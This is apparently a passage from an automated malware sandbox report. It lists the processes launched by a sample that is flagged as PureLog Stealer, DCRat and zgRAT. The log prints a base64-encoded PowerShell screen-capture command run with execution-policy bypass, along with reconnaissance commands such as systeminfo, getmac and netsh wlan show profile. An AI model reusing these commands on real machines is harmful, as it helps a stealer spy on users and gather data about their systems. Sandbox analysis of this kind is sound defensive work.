                                                                                                  Start time:18:07:12
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:49
                                                                                                  Start time:18:07:12
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:50
                                                                                                  Start time:18:07:12
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:51
                                                                                                  Start time:18:07:12
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:52
                                                                                                  Start time:18:07:12
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                                                                                  Imagebase:0xaf0000
                                                                                                  File size:3'720'704 bytes
                                                                                                  MD5 hash:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000034.00000000.1797015711.0000000000AF2000.00000002.00000001.01000000.00000025.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000034.00000002.1960895196.000000001341B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 92%, ReversingLabs
                                                                                                  Has exited:true

                                                                                                  Target ID:53
                                                                                                  Start time:18:07:12
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:54
                                                                                                  Start time:18:07:12
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:netsh wlan show profile
                                                                                                  Imagebase:0x7ff7e6cf0000
                                                                                                  File size:96'768 bytes
                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:55
                                                                                                  Start time:18:07:12
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:56
                                                                                                  Start time:18:07:13
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:tree /A /F
                                                                                                  Imagebase:0x7ff768f20000
                                                                                                  File size:20'992 bytes
                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:57
                                                                                                  Start time:18:07:13
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:systeminfo
                                                                                                  Imagebase:0x7ff70baa0000
                                                                                                  File size:110'080 bytes
                                                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:58
                                                                                                  Start time:18:07:13
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:61
                                                                                                  Start time:18:07:17
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline"
                                                                                                  Imagebase:0x7ff6563b0000
                                                                                                  File size:2'759'232 bytes
                                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:62
                                                                                                  Start time:18:07:18
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46F0.tmp" "c:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP"
                                                                                                  Imagebase:0x7ff6a91f0000
                                                                                                  File size:52'744 bytes
                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:63
                                                                                                  Start time:18:07:19
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:64
                                                                                                  Start time:18:07:19
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:65
                                                                                                  Start time:18:07:19
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:66
                                                                                                  Start time:18:07:19
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:67
                                                                                                  Start time:18:07:20
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\getmac.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:getmac
                                                                                                  Imagebase:0x7ff71e200000
                                                                                                  File size:90'112 bytes
                                                                                                  MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:68
                                                                                                  Start time:18:07:20
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:tree /A /F
                                                                                                  Imagebase:0x7ff768f20000
                                                                                                  File size:20'992 bytes
                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:69
                                                                                                  Start time:18:07:21
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:71
                                                                                                  Start time:18:07:21
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:74
                                                                                                  Start time:18:07:21
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:tree /A /F
                                                                                                  Imagebase:0x7ff768f20000
                                                                                                  File size:20'992 bytes
                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:75
                                                                                                  Start time:18:07:21
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline"
                                                                                                  Imagebase:0x7ff6563b0000
                                                                                                  File size:2'759'232 bytes
                                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:76
                                                                                                  Start time:18:07:21
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:77
                                                                                                  Start time:18:07:21
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES541F.tmp" "c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP"
                                                                                                  Imagebase:0x7ff6a91f0000
                                                                                                  File size:52'744 bytes
                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:78
                                                                                                  Start time:18:07:21
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:79
                                                                                                  Start time:18:07:22
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
